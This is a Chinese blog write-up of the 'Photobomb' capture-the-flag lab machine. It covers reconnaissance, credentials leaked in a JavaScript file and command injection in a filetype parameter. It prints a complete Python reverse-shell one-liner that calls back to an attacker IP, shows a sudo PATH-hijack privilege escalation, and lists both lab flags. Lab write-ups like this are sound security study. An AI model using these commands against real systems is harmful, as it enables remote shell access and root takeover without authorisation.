Photobomb靶机
nmap扫描
访问80端口网页,在此之前要先去host文件将ip域名绑定。
下面有个点击按钮,弹出一个登录框
F12,看到js文件信息泄露
使用用户名密码登录
是个图片下载站,可以下载文件,没信息抓个包
可以看到有三个可控参数
测试一下这些参数有没有命令注入,开一个监听
测试到filetype参数时,成功。
反弹shell
利用shell生成网站生成
export RHOST="10.10.16.6";export RPORT=6666;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
注意,放入bp时,需要把空格替换成+
拿到普通用户shell
拿到userflag:87ad4f92660fd0582bf4be5dee6c7bb2
提权
先查看当前用户能用sudo执行些什么
有一个root权限的bash脚本,查看文件,功能为清理日志文件,获取日志文件并将其内容移动到photobomb.log.old然后使用truncate清除photobomb.log
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;这里使用到的是相对路径而不是绝对路径
在当前目录创建一个find文件,里面写一个shell,将环境变量改为当前目录,sudo执行cleanup.sh
拿到root权限shell ,得到rootflag:bad337481d54051abd1e86a01ce42933
环境变量提权,相关链接https://juejin.cn/post/7165030726461718535
- 本文标题:Photobomb靶机
- 本文作者:n3ym4r
- 创建时间:2023-02-05 18:51:14
- 本文链接:https://n3ym4r.github.io/2023/02/05/Photobomb靶机/
- 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!